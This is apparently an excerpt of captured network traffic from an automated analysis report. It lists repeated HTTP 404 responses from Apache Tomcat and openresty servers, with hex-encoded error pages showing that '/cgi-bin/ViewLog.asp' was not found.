    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Language: enContent-Length: 989Date: Thu, 23 Nov 2023 04:12:52 GMTData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Language: enContent-Length: 989Date: Thu, 23 Nov 2023 04:12:48 GMTData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Language: enContent-Length: 989Date: Thu, 23 Nov 2023 04:12:52 GMTData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Language: enContent-Length: 989Date: Thu, 23 Nov 2023 04:13:01 GMTData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeTransfer-Encoding: chunked
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Language: enContent-Length: 989Date: Thu, 23 Nov 2023 04:13:01 GMTData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Thu, 23 Nov 2023 04:15:56 GMTContent-Type: text/htmlContent-Length: 150Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Language: enContent-Length: 989Date: Thu, 23 Nov 2023 04:12:46 GMTData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73
